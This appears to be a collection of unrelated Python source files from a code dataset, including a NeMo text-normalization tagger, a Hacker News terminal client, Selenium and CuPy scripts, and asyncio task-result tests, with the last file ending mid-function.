DEBUG = True
|
StarcoderdataPython
|
134360
|
# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pynini
from nemo_text_processing.text_normalization.de.taggers.decimal import get_quantity, quantities
from nemo_text_processing.text_normalization.en.graph_utils import NEMO_SIGMA, GraphFst
from pynini.lib import pynutil
class DecimalFst(GraphFst):
"""
Finite state transducer for classifying decimal
e.g. minus elf komma zwei null null sechs billionen -> decimal { negative: "true" integer_part: "11" fractional_part: "2006" quantity: "billionen" }
e.g. eine billion -> decimal { integer_part: "1" quantity: "billion" }
Args:
itn_cardinal_tagger: ITN Cardinal tagger
tn_decimal_tagger: TN decimal tagger
"""
def __init__(self, itn_cardinal_tagger: GraphFst, tn_decimal_tagger: GraphFst, deterministic: bool = True):
super().__init__(name="decimal", kind="classify", deterministic=deterministic)
self.graph = tn_decimal_tagger.graph.invert().optimize()
delete_point = pynutil.delete(" komma")
allow_spelling = pynini.cdrewrite(pynini.cross("eine ", "eins ") + quantities, "[BOS]", "[EOS]", NEMO_SIGMA)
graph_fractional = pynutil.insert("fractional_part: \"") + self.graph + pynutil.insert("\"")
graph_integer = (
pynutil.insert("integer_part: \"") + itn_cardinal_tagger.graph_no_exception + pynutil.insert("\"")
)
final_graph_wo_sign = graph_integer + delete_point + pynini.accep(" ") + graph_fractional
self.final_graph_wo_negative = (
allow_spelling
@ (
final_graph_wo_sign
| get_quantity(
final_graph_wo_sign, itn_cardinal_tagger.graph_hundred_component_at_least_one_none_zero_digit
)
).optimize()
)
final_graph = itn_cardinal_tagger.optional_minus_graph + self.final_graph_wo_negative
final_graph += pynutil.insert(" preserve_order: true")
final_graph = self.add_tokens(final_graph)
self.fst = final_graph.optimize()
|
StarcoderdataPython
|
1651441
|
from django.apps import AppConfig
class TurfsConfig(AppConfig):
name = 'turfs'
|
StarcoderdataPython
|
1706250
|
<reponame>LyQuid12/Whitehat-CLI<gh_stars>0
from setuptools import setup, find_packages
import re
with open('README.md') as f:
long_description = f.read()
version = ''
with open('wht/__init__.py') as f:
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', f.read(), re.MULTILINE).group(1)
if not version:
raise TypeError('Version is not set')
def read_requirements():
with open('requirements.txt', 'r') as req:
content = req.read()
requirements = content.split('\n')
return requirements
setup(
name='whitehat-cli',
version=version,
author='LyQuid',
author_email='<EMAIL>',
description = 'CLI Version of Whitehat Packages',
long_description=long_description,
long_description_content_type='text/markdown',
license='Apache License 2.0',
packages=find_packages(),
include_package_data=True,
install_requires=read_requirements(),
entry_points="""
[console_scripts]
wht=wht.cli:cli
""",
)
|
StarcoderdataPython
|
1744412
|
import torch
import argparse
# ----- Parser -----
def parser():
PARSER = argparse.ArgumentParser(description='Training parameters.')
# Dataset
PARSER.add_argument('--dataset', default='CelebA', type=str,
choices=['CIFAR10', 'CelebA', 'Imagenette', 'ImageNet32', 'ImageNet64'],
help="Data to be used.")
PARSER.add_argument('--img_resize', default=64, type=int,
help='Change image resolution.')
# Model
PARSER.add_argument('--model', default='VAE', type=str,
choices=['VAE', 'srVAE'],
help="Model to be used.")
PARSER.add_argument('--network', default='densenet32', type=str,
help="Neural Network architecture to be used.")
# Prior
PARSER.add_argument('--prior', default='MixtureOfGaussians', type=str,
choices=['StandardNormal', 'MixtureOfGaussians', 'RealNVP'],
help='Prior type.')
PARSER.add_argument('--z_dim', default=128, type=int,
help='Dimensionality of z latent space.')
PARSER.add_argument('--u_dim', default=128, type=int,
help='Dimensionality of z latent space.')
# data likelihood
PARSER.add_argument('--likelihood', default='dmol', type=str,
choices=['dmol'],
help="Type of likelihood.")
PARSER.add_argument('--iw_test', default=512, type=int,
help="Number of Importance Weighting samples used for approximating the test log-likelihood.")
# Training Parameters
PARSER.add_argument('--batch_size', default=64, type=int,
help='Batch size.')
PARSER.add_argument('--epochs', default=50, type=int,
help='Number of training epochs.')
# General Configs
PARSER.add_argument('--seed', default=141, type=int,
help='Fix random seed.')
PARSER.add_argument('--n_samples', default=8, type=int,
help='Number of generated samples.')
PARSER.add_argument('--log_interval', default=True, type=bool,
help='Print progress on every batch.')
PARSER.add_argument('--device', default=None, type=str,
choices=['cpu', 'cuda'],
help='Device to run the experiment.')
#PARSER.add_argument('--use_tb', default=True, type=bool,
# help='Use TensorBoard.')
PARSER.add_argument('--use_tb', dest='use_tb', action='store_true')
PARSER.add_argument('--no_tb', dest='use_tb', action='store_false')
PARSER.set_defaults(use_tb=True)
PARSER.add_argument('--tags', default='logs', type=str,
help='Run tags.')
ARGS = PARSER.parse_args()
# Check device
if ARGS.device is None:
ARGS.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
return ARGS
args = parser()
if __name__ == "__main__":
pass
|
StarcoderdataPython
|
21480
|
<filename>tests/unit/states/test_slack.py
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`<NAME> <<EMAIL>>`
'''
# Import Python libs
from __future__ import absolute_import, unicode_literals, print_function
# Import Salt Testing Libs
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import skipIf, TestCase
from tests.support.mock import (
NO_MOCK,
NO_MOCK_REASON,
MagicMock,
patch
)
# Import Salt Libs
import salt.states.slack as slack
@skipIf(NO_MOCK, NO_MOCK_REASON)
class SlackTestCase(TestCase, LoaderModuleMockMixin):
'''
Test cases for salt.states.slack
'''
def setup_loader_modules(self):
return {slack: {}}
# 'post_message' function tests: 1
def test_post_message(self):
'''
Test to send a message to a Slack channel.
'''
name = 'slack-message'
channel = '#general'
from_name = 'SuperAdmin'
message = 'This state was executed successfully.'
ret = {'name': name,
'changes': {},
'result': None,
'comment': ''}
with patch.dict(slack.__opts__, {'test': True}):
comt = ('The following message is to be sent to Slack: {0}'
.format(message))
ret.update({'comment': comt})
self.assertDictEqual(slack.post_message(name, channel, from_name,
message), ret)
with patch.dict(slack.__opts__, {'test': False}):
comt = ('Slack channel is missing: None')
ret.update({'comment': comt, 'result': False})
self.assertDictEqual(slack.post_message(name, None, from_name,
message), ret)
comt = ('Slack from name is missing: None')
ret.update({'comment': comt, 'result': False})
self.assertDictEqual(slack.post_message(name, channel, None,
message), ret)
comt = ('Slack message is missing: None')
ret.update({'comment': comt, 'result': False})
self.assertDictEqual(slack.post_message(name, channel, from_name,
None), ret)
mock = MagicMock(return_value=True)
with patch.dict(slack.__salt__, {'slack.post_message': mock}):
comt = ('Sent message: slack-message')
ret.update({'comment': comt, 'result': True})
self.assertDictEqual(slack.post_message(name, channel,
from_name, message),
ret)
|
StarcoderdataPython
|
3307219
|
# -*- coding: utf-8 -*-
import sys
import urwid
import subprocess
import threading
from pyhn.popup import Popup
from pyhn.poller import Poller
from pyhn.config import Config, FALSE_WORDS, TRUE_WORDS
from pyhn import __version__
PY3 = False
if sys.version_info.major == 3:
PY3 = True
if PY3:
from urllib.parse import urlparse
else:
from urlparse import urlparse
class ItemWidget(urwid.WidgetWrap):
""" Widget of listbox, represent each story """
def __init__(self, story, show_published_time, show_score, show_comments):
self.story = story
self.number = story.number
self.title = story.title.encode('utf-8')
self.url = story.url
self.domain = urlparse(story.domain).netloc
self.submitter = story.submitter
self.submitter_url = story.submitter_url
self.comment_count = story.comment_count
self.comments_url = story.comments_url
self.score = story.score
self.published_time = story.published_time
self.show_published_time = show_published_time
self.show_score = show_score
self.show_comments = show_comments
if self.number is None:
number_text = '-'
number_align = 'center'
self.number = '-'
else:
number_align = 'right'
number_text = '%s:' % self.number
if self.submitter is None:
self.submitter = None
self.submitter_url = None
if self.score is None:
self.score = "-"
if self.comment_count is None:
comment_text = '-'
self.comment_count = None
self.comments_url = None
else:
comment_text = '%s' % self.comment_count
title = self.title
try:
title = title.encode('latin')
except:
pass
self.item = [
('fixed', 4, urwid.Padding(urwid.AttrWrap(
urwid.Text(number_text, align=number_align),
'body', 'focus'))),
urwid.AttrWrap(
urwid.Text(title), 'body', 'focus'),
]
if self.show_published_time:
self.item.append(
('fixed', 15, urwid.Padding(urwid.AttrWrap(
urwid.Text(str(self.published_time), align="right"), 'body', 'focus'))),
)
if self.show_score:
self.item.append(
('fixed', 5, urwid.Padding(urwid.AttrWrap(
urwid.Text(str(self.score), align="right"), 'body', 'focus'))),
)
if self.show_comments:
self.item.append(
('fixed', 8, urwid.Padding(urwid.AttrWrap(
urwid.Text(comment_text, align="right"),
'body', 'focus')))
)
w = urwid.Columns(self.item, focus_column=1, dividechars=1)
self.__super.__init__(w)
def selectable(self):
return True
def keypress(self, size, key):
return key
class HNGui(object):
""" The Pyhn Gui object """
def __init__(self, cache_manager):
self.cache_manager = cache_manager
self.already_build = False
self.on_comments = False
self.which = "top"
self.config = Config()
self.poller = Poller(
self, delay=int(
self.config.parser.get('settings', 'refresh_interval')))
self.palette = self.config.get_palette()
self.show_comments = self.config.parser.get('interface', 'show_comments') in TRUE_WORDS
self.show_score = self.config.parser.get('interface', 'show_score') in TRUE_WORDS
self.show_published_time = self.config.parser.get(
'interface', 'show_published_time') in TRUE_WORDS
def main(self):
"""
Main Gui function which create Ui object,
build interface and run the loop
"""
self.ui = urwid.raw_display.Screen()
self.ui.register_palette(self.palette)
self.build_interface()
self.ui.run_wrapper(self.run)
def build_help(self):
""" Fetch all key bindings and build help message """
self.bindings = {}
self.help_msg = []
self.help_msg.append(
urwid.AttrWrap(urwid.Text('\n Key bindings \n'), 'title'))
self.help_msg.append(urwid.AttrWrap(urwid.Text(''), 'help'))
for binding in self.config.parser.items('keybindings'):
self.bindings[binding[0]] = binding[1]
line = urwid.AttrWrap(
urwid.Text(
' %s: %s ' % (binding[1], binding[0].replace('_', ' '))),
'help')
self.help_msg.append(line)
self.help_msg.append(urwid.AttrWrap(
urwid.Text(' ctrl mouse-left: open story link'), 'help'))
self.help_msg.append(urwid.AttrWrap(urwid.Text(''), 'help'))
self.help_msg.append(urwid.AttrWrap(
urwid.Text(
' Thanks for using Pyhn %s! ' % __version__, align='center'),
'title'))
self.help_msg.append(urwid.AttrWrap(urwid.Text(''), 'help'))
self.help_msg.append(
urwid.AttrWrap(urwid.Text(
' Author : toxinu'), 'help'))
self.help_msg.append(urwid.AttrWrap(
urwid.Text(' Code : https://github.com/toxinu/pyhn '),
'help'))
self.help_msg.append(urwid.AttrWrap(
urwid.Text(' Website: http://toxinu.github.io '),
'help'))
self.help_msg.append(urwid.AttrWrap(urwid.Text(''), 'help'))
self.help_msg.append(urwid.AttrWrap(urwid.Text(''), 'help'))
self.help_msg.append(urwid.AttrWrap(urwid.Text(''), 'help'))
self.help = Popup(self.help_msg, ('help', 'help'), (0, 1), self.view)
def build_interface(self):
"""
Build interface, refresh cache if needed, update stories listbox,
create header, footer, view and the loop.
"""
if self.cache_manager.is_outdated():
self.cache_manager.refresh()
self.stories = self.cache_manager.get_stories()
self.update_stories(self.stories)
self.header_content = [
('fixed', 4, urwid.Padding(
urwid.AttrWrap(urwid.Text(' N°'), 'header'))),
urwid.AttrWrap(urwid.Text('TOP STORIES', align="center"), 'title'),
]
if self.show_published_time:
self.header_content.append(
('fixed', 15, urwid.Padding(
urwid.AttrWrap(urwid.Text('PUBLISHED TIME'), 'header'))),
)
if self.show_score:
self.header_content.append(
('fixed', 5, urwid.Padding(
urwid.AttrWrap(urwid.Text('SCORE'), 'header'))),
)
if self.show_comments:
self.header_content.append(
('fixed', 8, urwid.Padding(
urwid.AttrWrap(urwid.Text('COMMENTS'), 'header')))
)
self.header = urwid.Columns(self.header_content, dividechars=1)
self.footer = urwid.AttrMap(
urwid.Text(
'Welcome in pyhn by toxinu '
'(https://github.com/toxinu/pyhn)', align='center'),
'footer')
self.view = urwid.Frame(
urwid.AttrWrap(
self.listbox, 'body'), header=self.header, footer=self.footer)
self.loop = urwid.MainLoop(
self.view,
self.palette,
screen=self.ui,
handle_mouse=True,
unhandled_input=self.keystroke)
self.build_help()
self.already_build = True
def set_help(self):
""" Set help msg in footer """
self.view.set_footer(
urwid.AttrWrap(urwid.Text(self.help, align="center"), 'help'))
def set_footer(self, msg, style="normal"):
""" Set centered footer message """
if style == "normal":
self.footer = urwid.AttrWrap(urwid.Text(msg), 'footer')
self.view.set_footer(self.footer)
elif style == "error":
self.footer = urwid.AttrWrap(urwid.Text(msg), 'footer-error')
self.view.set_footer(self.footer)
def set_header(self, msg):
""" Set header story message """
self.header_content[1] = urwid.AttrWrap(
urwid.Text(msg, align="center"), 'title')
self.view.set_header(urwid.Columns(self.header_content, dividechars=1))
def keystroke(self, input):
""" All key bindings are computed here """
# QUIT
if input in ('q', 'Q'):
self.exit(must_raise=True)
# LINKS
if input in self.bindings['open_comments_link'].split(','):
if not self.listbox.get_focus()[0].comments_url:
self.set_footer('No comments')
else:
if not self.on_comments:
self.show_comments(self.listbox.get_focus()[0])
self.on_comments = True
else:
self.update_stories(
self.cache_manager.get_stories(self.which))
self.on_comments = False
self.open_webbrowser(self.listbox.get_focus()[0].comments_url)
if input in self.bindings['show_comments_link'].split(','):
if not self.listbox.get_focus()[0].comments_url:
self.set_footer('No comments')
else:
self.set_footer(self.listbox.get_focus()[0].comments_url)
if input in self.bindings['open_story_link'].split(','):
self.open_webbrowser(self.listbox.get_focus()[0].url)
if input in self.bindings['show_story_link'].split(','):
self.set_footer(self.listbox.get_focus()[0].url)
if input in self.bindings['open_submitter_link'].split(','):
if not self.listbox.get_focus()[0].submitter_url:
self.set_footer('No submitter')
else:
self.open_webbrowser(self.listbox.get_focus()[0].submitter_url)
if input in self.bindings['show_submitter_link'].split(','):
if not self.listbox.get_focus()[0].submitter_url:
self.set_footer('No submitter')
else:
self.set_footer(self.listbox.get_focus()[0].submitter_url)
# MOVEMENTS
if input in self.bindings['down'].split(','):
if self.listbox.focus_position - 1 in self.walker.positions():
self.listbox.set_focus(
self.walker.prev_position(self.listbox.focus_position))
if input in self.bindings['up'].split(','):
if self.listbox.focus_position + 1 in self.walker.positions():
self.listbox.set_focus(
self.walker.next_position(self.listbox.focus_position))
if input in self.bindings['page_up'].split(','):
self.listbox._keypress_page_up(self.ui.get_cols_rows())
if input in self.bindings['page_down'].split(','):
self.listbox._keypress_page_down(self.ui.get_cols_rows())
if input in self.bindings['first_story'].split(','):
self.listbox.set_focus(self.walker.positions()[0])
if input in self.bindings['last_story'].split(','):
self.listbox.set_focus(self.walker.positions()[-1])
# STORIES
if input in self.bindings['newest_stories'].split(','):
self.set_footer('Syncing newest stories...')
threading.Thread(
None,
self.async_refresher,
None,
('newest', 'NEWEST STORIES'),
{}).start()
if input in self.bindings['top_stories'].split(','):
self.set_footer('Syncing top stories...')
threading.Thread(
None, self.async_refresher,
None, ('top', 'TOP STORIES'), {}).start()
if input in self.bindings['best_stories'].split(','):
self.set_footer('Syncing best stories...')
threading.Thread(
None, self.async_refresher,
None, ('best', 'BEST STORIES'), {}).start()
if input in self.bindings['show_stories'].split(','):
self.set_footer('Syncing show stories...')
threading.Thread(
None, self.async_refresher,
None, ('show', 'SHOW STORIES'), {}).start()
if input in self.bindings['show_newest_stories'].split(','):
self.set_footer('Syncing show newest stories...')
threading.Thread(
None,
self.async_refresher,
None,
('show_newest', 'SHOW NEWEST STORIES'),
{}).start()
if input in self.bindings['ask_stories'].split(','):
self.set_footer('Syncing ask stories...')
threading.Thread(
None, self.async_refresher,
None, ('ask', 'ASK STORIES'), {}).start()
if input in self.bindings['jobs_stories'].split(','):
self.set_footer('Syncing jobs stories...')
threading.Thread(
None, self.async_refresher,
None, ('jobs', 'JOBS STORIES'), {}).start()
# OTHERS
if input in self.bindings['refresh'].split(','):
self.set_footer('Refreshing new stories...')
threading.Thread(
None, self.async_refresher, None, (), {'force': True}).start()
if input in self.bindings['reload_config'].split(','):
self.reload_config()
if input in ('h', 'H', '?'):
keys = True
while True:
if keys:
self.ui.draw_screen(
self.ui.get_cols_rows(),
self.help.render(self.ui.get_cols_rows(), True))
keys = self.ui.get_input()
if 'h' or 'H' or '?' or 'escape' in keys:
break
# MOUSE
if len(input) > 1 and input[0] == 'ctrl mouse release':
self.open_webbrowser(self.listbox.get_focus()[0].url)
def async_refresher(self, which=None, header=None, force=False):
if which is None:
which = self.which
if self.cache_manager.is_outdated(which) or force:
self.cache_manager.refresh(which)
stories = self.cache_manager.get_stories(which)
self.update_stories(stories)
if header is not None:
self.set_header(header)
self.which = which
self.loop.draw_screen()
def update_stories(self, stories):
""" Reload listbox and walker with new stories """
items = []
item_ids = []
for story in stories:
if story.id is not None and story.id in item_ids:
story.title = "- %s" % story.title
items.append(ItemWidget(
story,
self.show_published_time,
self.show_score,
self.show_comments))
else:
items.append(ItemWidget(
story,
self.show_published_time,
self.show_score,
self.show_comments))
item_ids.append(story.id)
if self.already_build:
self.walker[:] = items
self.update()
else:
self.walker = urwid.SimpleListWalker(items)
self.listbox = urwid.ListBox(self.walker)
def show_comments(self, story):
pass
def open_webbrowser(self, url):
""" Handle url and open sub process with web browser """
if self.config.parser.get('settings', 'browser_cmd') == "__default__":
python_bin = sys.executable
subprocess.Popen(
[python_bin, '-m', 'webbrowser', '-t', url],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
else:
cmd = self.config.parser.get('settings', 'browser_cmd')
try:
p = subprocess.Popen(
cmd.replace('__url__', url),
shell=True,
close_fds=True,
stderr=subprocess.PIPE)
returncode = p.wait()
except KeyboardInterrupt:
stderr = "User keyboard interrupt detected!"
self.set_footer(stderr, style="error")
return
if returncode > 0:
stderr = p.communicate()[1]
self.set_footer("%s" % stderr, style="error")
def update(self):
""" Update footer about focus story """
focus = self.listbox.get_focus()[0]
if not focus.submitter:
msg = "submitted %s" % focus.published_time
else:
msg = "submitted %s by %s" % (
focus.published_time, focus.submitter)
self.set_footer(msg)
def reload_config(self):
"""
Create new Config object, reload colors, refresh cache
if needed and redraw screen.
"""
self.set_footer('Reloading configuration')
self.config = Config()
self.build_help()
self.palette = self.config.get_palette()
self.build_interface()
self.loop.draw_screen()
self.set_footer('Configuration file reloaded!')
if self.config.parser.get(
'settings', 'cache') != self.cache_manager.cache_path:
self.cache_manager.cache_path = self.config.parser.get(
'settings', 'cache')
def exit(self, must_raise=False):
self.poller.is_running = False
self.poller.join()
if must_raise:
raise urwid.ExitMainLoop()
urwid.ExitMainLoop()
def run(self):
urwid.connect_signal(self.walker, 'modified', self.update)
try:
self.poller.start()
self.loop.run()
except KeyboardInterrupt:
self.exit()
print('Exiting... Bye!')
|
StarcoderdataPython
|
1789433
|
<filename>sql_gen/test/playground/rewire_verb_compiled.py
def root(context, missing=missing, environment=environment):
resolve = context.resolve_or_missing
undefined = environment.undefined
if 0:
yield None
l_0_adquery = resolve("adquery")
l_0_entity_def_id = resolve("entity_def_id")
l_0_prj_prefix = resolve("prj_prefix")
l_0_verb_name = resolve("verb_name")
l_0_entity_ids = l_0_process_descriptor_id = l_0_process_descriptor_ref_id = missing
t_1 = environment.filters["suggest"]
pass
l_0_entity_ids = context.call(
(undefined(name="adquery") if l_0_adquery is missing else l_0_adquery),
"SELECT KEYNAME FROM CCADMIN_IDMAP WHERE KEYSET ='ED'",
)
context.vars["entity_ids"] = l_0_entity_ids
context.exported_vars.add("entity_ids")
yield to_string(
t_1(
(
undefined(name="entity_def_id")
if l_0_entity_def_id is missing
else l_0_entity_def_id
),
(
undefined(name="entity_ids")
if l_0_entity_ids is missing
else l_0_entity_ids
),
)
)
yield "\n"
l_0_process_descriptor_id = (
context.call(
(
undefined(name="prj_prefix")
if l_0_prj_prefix is missing
else l_0_prj_prefix
)
)
+ context.call(
environment.getattr(
(
undefined(name="entity_def_id")
if l_0_entity_def_id is missing
else l_0_entity_def_id
),
"capitalize",
)
)
) + context.call(
environment.getattr(
(
undefined(name="verb_name")
if l_0_verb_name is missing
else l_0_verb_name
),
"capitalize",
)
)
context.vars["process_descriptor_id"] = l_0_process_descriptor_id
context.exported_vars.add("process_descriptor_id")
template = environment.get_template("add_process_descriptor.sql", "rewire_verb.sql")
for event in template.root_render_func(
template.new_context(
context.get_all(),
True,
{
"process_descriptor_id": l_0_process_descriptor_id,
"process_descriptor_ref_id": l_0_process_descriptor_ref_id,
"entity_ids": l_0_entity_ids,
},
)
):
yield event
l_0_process_descriptor_ref_id = (
undefined(name="process_descriptor_id")
if l_0_process_descriptor_id is missing
else l_0_process_descriptor_id
)
context.vars["process_descriptor_ref_id"] = l_0_process_descriptor_ref_id
context.exported_vars.add("process_descriptor_ref_id")
template = environment.get_template(
"add_process_descriptor_ref.sql", "rewire_verb.sql"
)
for event in template.root_render_func(
template.new_context(
context.get_all(),
True,
{
"process_descriptor_id": l_0_process_descriptor_id,
"process_descriptor_ref_id": l_0_process_descriptor_ref_id,
"entity_ids": l_0_entity_ids,
},
)
):
yield event
yield "\n\nUPDATE EVA_VERB \nSET (PROCESS_DESC_REF_ID) = (@PDR.%s)\nWHERE ENTITY_DEF_ID = @ED.%s AND NAME ='%s';" % (
(
undefined(name="process_descriptor_ref_id")
if l_0_process_descriptor_ref_id is missing
else l_0_process_descriptor_ref_id
),
(
undefined(name="entity_def_id")
if l_0_entity_def_id is missing
else l_0_entity_def_id
),
(undefined(name="verb_name") if l_0_verb_name is missing else l_0_verb_name),
)
|
StarcoderdataPython
|
3322422
|
from selenium import webdriver
import time
import math
def calc(xx):
return str(math.log(abs(12*math.sin(int(xx)))))
browser = webdriver.Chrome()
try:
link = "http://suninjuly.github.io/alert_accept.html"
browser.get(link)
button = browser.find_element_by_css_selector("button.btn")
button.click()
# переключаемся на окно
alert = browser.switch_to.alert
# клик на ок
alert.accept()
# Считать значение для переменной x
x_element = browser.find_element_by_id("input_value")
x = x_element.text
# Посчитать математическую функцию от x
y = calc(x)
# Ввести ответ в текстовое поле
input1 = browser.find_element_by_id("answer")
input1.send_keys(y)
# Нажать на кнопку Submit
button = browser.find_element_by_css_selector("button.btn")
button.click()
finally:
time.sleep(10)
browser.quit()
|
StarcoderdataPython
|
31800
|
<gh_stars>1-10
import cupy as cp
import numpy as np
import pandas as pd
import itertools
import math
import networkx as nx
from gpucsl.pc.kernel_management import get_module
function_names = [
"compact<6,6>",
]
module = get_module("helpers/graph_helpers.cu", function_names, ("-D", "PYTHON_TEST"))
def test_compact_on_random_skeleton():
kernel = module.get_function("compact<6,6>")
d_skeleton = cp.array(
[
[0, 1, 1, 0, 0, 1],
[1, 0, 1, 0, 1, 0],
[0, 0, 0, 0, 0, 0],
[1, 1, 1, 0, 1, 1],
[1, 0, 1, 0, 0, 1],
[0, 1, 1, 1, 0, 0],
],
np.uint16,
)
expected_result = np.array(
[
[3, 1, 2, 5, 0, 0],
[3, 0, 2, 4, 0, 0],
[0, 0, 0, 0, 0, 0],
[5, 0, 1, 2, 4, 5],
[3, 0, 2, 5, 0, 0],
[3, 1, 2, 3, 0, 0],
],
np.uint32,
)
d_compacted_skeleton = cp.zeros((6, 6), np.uint32)
kernel((1,), (6,), (d_skeleton, d_compacted_skeleton, 0, 6))
assert cp.isclose(expected_result, d_compacted_skeleton).all()
def test_compact_on_fully_connected_skeleton():
kernel = module.get_function("compact<6,6>")
d_skeleton = cp.ones((6, 6), np.uint16)
expected_result = np.array(
[
[5, 1, 2, 3, 4, 5],
[5, 0, 2, 3, 4, 5],
[5, 0, 1, 3, 4, 5],
[5, 0, 1, 2, 4, 5],
[5, 0, 1, 2, 3, 5],
[5, 0, 1, 2, 3, 4],
],
np.uint32,
)
d_compacted_skeleton = cp.zeros((6, 6), np.uint32)
kernel((1,), (6,), (d_skeleton, d_compacted_skeleton, 0, 6))
assert cp.array_equal(expected_result, d_compacted_skeleton.get())
def test_compact_on_random_big_skeleton():
kernel = module.get_function("compact<6,6>")
size = 5000
d_skeleton = cp.random.choice([0, 1], size=(size, size)).astype(np.uint16)
d_compacted_skeleton = cp.zeros((6, 6), np.uint32)
print((math.ceil(size / 512),))
print((min(512, size),))
cp.cuda.profiler.start()
kernel(
(math.ceil(size / 512),),
(min(512, size),),
(d_skeleton, d_compacted_skeleton, 0, size),
)
cp.cuda.profiler.stop()
|
StarcoderdataPython
|
3209225
|
import asyncio
import time as ttime
from bluesky_queueserver.manager.task_results import TaskResults
def test_TaskResults_update_uid():
"""
TaskResults: Test that task result UID is updated.
"""
async def testing():
tr = TaskResults()
uid = tr.task_results_uid
assert isinstance(uid, str)
tr._update_task_results_uid()
assert tr.task_results_uid != uid
asyncio.run(testing())
def test_TaskResults_add_running_task():
"""
TaskResults: tests for ``add_running_task``, ``clear_running_task``
"""
async def testing():
tr = TaskResults()
assert tr._running_tasks == {}
uid = tr.task_results_uid
await tr.add_running_task(task_uid="abc")
await tr.add_running_task(task_uid="def", payload={"some_value": 10})
assert len(tr._running_tasks) == 2
assert tr._running_tasks["abc"]["payload"] == {}
assert isinstance(tr._running_tasks["abc"]["time"], float)
assert tr._running_tasks["def"]["payload"] == {"some_value": 10}
assert isinstance(tr._running_tasks["def"]["time"], float)
await tr.clear_running_tasks()
assert tr._running_tasks == {}
# UID is not expected to change
assert tr.task_results_uid == uid
asyncio.run(testing())
def test_TaskResults_remove_running_task():
"""
TaskResults: tests for ``remove_running_task``
"""
async def testing():
tr = TaskResults()
assert tr._running_tasks == {}
uid = tr.task_results_uid
await tr.add_running_task(task_uid="abc")
await tr.add_running_task(task_uid="def", payload={"some_value": 10})
assert len(tr._running_tasks) == 2
await tr.remove_running_task(task_uid="abc")
assert len(tr._running_tasks) == 1
assert tr._running_tasks["def"]["payload"] == {"some_value": 10}
assert isinstance(tr._running_tasks["def"]["time"], float)
# UID is not expected to change
assert tr.task_results_uid == uid
asyncio.run(testing())
def test_TaskResults_add_completed_task():
"""
TaskResults: tests for ``add_running_task``, ``clear_running_task``
"""
async def testing():
tr = TaskResults()
uid1 = tr.task_results_uid
# Add running tasks. The running tasks should be removed as completed tasks
# with the same UID are added.
await tr.add_running_task(task_uid="abc", payload={"some_value": "arbitrary_payload"})
await tr.add_running_task(task_uid="def", payload={"some_value": "arbitrary_payload"})
assert tr.task_results_uid == uid1
assert tr._completed_tasks_time == []
assert tr._completed_tasks_data == {}
assert len(tr._running_tasks) == 2
await tr.add_completed_task(task_uid="abc")
uid2 = tr.task_results_uid
await tr.add_completed_task(task_uid="def", payload={"some_value": 10})
uid3 = tr.task_results_uid
assert len(tr._completed_tasks_time) == 2
assert len(tr._completed_tasks_data) == 2
assert len(tr._running_tasks) == 0
assert uid1 != uid2
assert uid2 != uid3
assert tr._completed_tasks_data["abc"]["payload"] == {}
assert isinstance(tr._completed_tasks_data["abc"]["time"], float)
assert tr._completed_tasks_time[0]["task_uid"] == "abc"
assert tr._completed_tasks_time[0]["time"] == tr._completed_tasks_data["abc"]["time"]
assert tr._completed_tasks_data["def"]["payload"] == {"some_value": 10}
assert isinstance(tr._completed_tasks_data["def"]["time"], float)
assert tr._completed_tasks_time[1]["task_uid"] == "def"
assert tr._completed_tasks_time[1]["time"] == tr._completed_tasks_data["def"]["time"]
await tr.clear()
assert tr._completed_tasks_time == []
assert tr._completed_tasks_data == {}
# UID is not expected to change
assert tr.task_results_uid == uid3
asyncio.run(testing())
def test_TaskResults_clear():
"""
TaskResults: tests for ``clear``
"""
async def testing():
tr = TaskResults()
await tr.add_running_task(task_uid="abc", payload={"some_value": "arbitrary_payload"})
await tr.add_running_task(task_uid="def", payload={"some_value": "arbitrary_payload"})
await tr.add_completed_task(task_uid="abc")
assert len(tr._completed_tasks_time) == 1
assert len(tr._completed_tasks_data) == 1
assert len(tr._running_tasks) == 1
uid = tr.task_results_uid
await tr.clear()
assert tr._running_tasks == {}
assert tr._completed_tasks_time == []
assert tr._completed_tasks_data == {}
# UID is not expected to change
assert tr.task_results_uid == uid
asyncio.run(testing())
def test_TaskResults_clean_completed_tasks_1():
"""
TaskResults: tests for ``clean_completed_tasks``
"""
async def testing():
tr = TaskResults(retention_time=1) # Intentionally set short retention time
await tr.add_completed_task(task_uid="abc")
assert len(tr._completed_tasks_data) == 1
assert len(tr._completed_tasks_time) == 1
await tr.clean_completed_tasks() # No effect
assert len(tr._completed_tasks_data) == 1
assert len(tr._completed_tasks_time) == 1
ttime.sleep(0.8)
# 'add_completed_task' is expected to 'clean' tha task list, but there are no expired tasks yet.
await tr.add_completed_task(task_uid="def", payload={"some_value": 10})
assert len(tr._completed_tasks_data) == 2
assert len(tr._completed_tasks_time) == 2
ttime.sleep(0.5)
await tr.clean_completed_tasks() # Should remove the 1st task
assert len(tr._completed_tasks_data) == 1
assert len(tr._completed_tasks_time) == 1
ttime.sleep(0.8)
await tr.clean_completed_tasks() # Should remove the 2nd task
assert len(tr._completed_tasks_data) == 0
assert len(tr._completed_tasks_time) == 0
asyncio.run(testing())
def test_TaskResults_clean_completed_tasks_2():
"""
TaskResults: tests that ``clean_completed_tasks`` is implicitely called when completed task is added.
"""
async def testing():
tr = TaskResults(retention_time=1) # Intentionally set short retention time
await tr.add_completed_task(task_uid="abc")
assert len(tr._completed_tasks_data) == 1
assert len(tr._completed_tasks_time) == 1
ttime.sleep(1.5)
# Adds the 2nd task, but removes the 1st (because it is expired)
await tr.add_completed_task(task_uid="def", payload={"some_value": 10})
assert len(tr._completed_tasks_data) == 1
assert len(tr._completed_tasks_time) == 1
assert tr._completed_tasks_time[0]["task_uid"] == "def"
assert list(tr._completed_tasks_data.keys())[0] == "def"
asyncio.run(testing())
def test_TaskResults_get_task_info():
"""
TaskResults: ``get_task_info``.
"""
async def testing():
